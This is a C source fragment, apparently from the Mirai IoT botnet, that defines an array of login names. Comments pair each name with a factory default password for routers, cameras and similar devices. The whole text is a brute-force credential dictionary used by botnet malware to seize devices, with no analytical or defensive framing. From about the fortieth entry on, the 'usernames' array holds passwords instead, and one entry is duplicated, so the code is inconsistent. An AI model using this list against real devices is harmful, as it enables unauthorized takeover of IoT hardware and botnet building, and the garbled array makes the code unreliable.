char *Mirai_Usernames[] = {
   
    "root\0", //root:xc3511
    "root\0", //root:vizxv
    "root\0", //root:admin
    "admin\0", //admin:admin
    "root\0", //root:888888
    "root\0", //root:xmhdipc
    "root\0", //root:default
    "root\0", //root:juantech
    "root\0", //root:123456
    "root\0", //root:54321
    "support\0", //support:support
    "root\0", //root:(none)
    "admin\0", //admin:password
    "root\0", //root:root
    "root\0", //root:12345
    "user\0", //user:user
    "admin\0", //admin:(none)
    "root\0", //root:pass
    "admin\0", //admin:admin1234
    "root\0", //root:1111
    "admin\0", //admin:smcadmin
    "admin\0", //admin:1111
    "root\0", //root:666666
    "root\0", //root:password
    "root\0", //root:1234
    "root\0", //root:klv123
    "Administrator\0", //Administrator:admin
    "service\0", //service:service
    "supervisor\0", //supervisor:supervisor
    "guest\0", //guest:guest
    "guest\0", //guest:12345
    "guest\0", //guest:12345
    "admin1\0", //admin1:password
    "administrator\0", //administrator:1234
    "666666\0", //666666:666666
    "888888\0", //888888:888888
    "ubnt\0", //ubnt:ubnt
    "klv1234\0", //root:klv1234
    "Zte521\0", //root:Zte521
    "hi3518\0", //root:hi3518
    "jvbzd\0", //root:jvbzd
    "anko\0", //root:anko
    "zlxx\0", //root:zlxx
    "7ujMko0vizxv\0", //root:7ujMko0vizxv
    "7ujMko0admin\0", //root:7ujMko0admin
    "system\0", //root:system
    "ikwb\0", //root:ikwb
    "dreambox\0", //root:dreambox
    "user\0", //root:user
    "realtek\0", //root:realtek
    "00000000\0", //root:00000000
    "1111111\0", //admin:1111111
    "1234\0", //admin:1234
    "12345\0", //admin:12345
    "54321\0", //admin:54321
    "123456\0", //admin:123456
    "7ujMko0admin\0", //admin:7ujMko0admin
    "1234\0", //admin:1234
    "pass\0", //admin:pass
    "meinsm\0", //admin:meinsm
    "tech\0", //tech:tech
    "fucker\0", //mother:fucker
};
